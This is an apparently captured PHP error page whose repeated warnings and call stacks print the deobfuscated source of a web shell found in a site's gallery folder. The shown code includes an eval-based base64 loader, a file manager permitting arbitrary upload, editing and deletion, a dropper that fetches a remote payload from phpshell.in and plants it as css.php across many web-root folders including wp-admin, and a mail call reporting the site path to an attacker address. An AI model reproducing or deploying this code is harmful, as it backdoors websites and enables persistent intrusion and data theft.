( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 106
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1242540296fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:106
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 107
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1276540296fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:107 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/includes/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 115
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1501540296fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:115
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 116
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1539540296fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:116
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 117
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0016521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
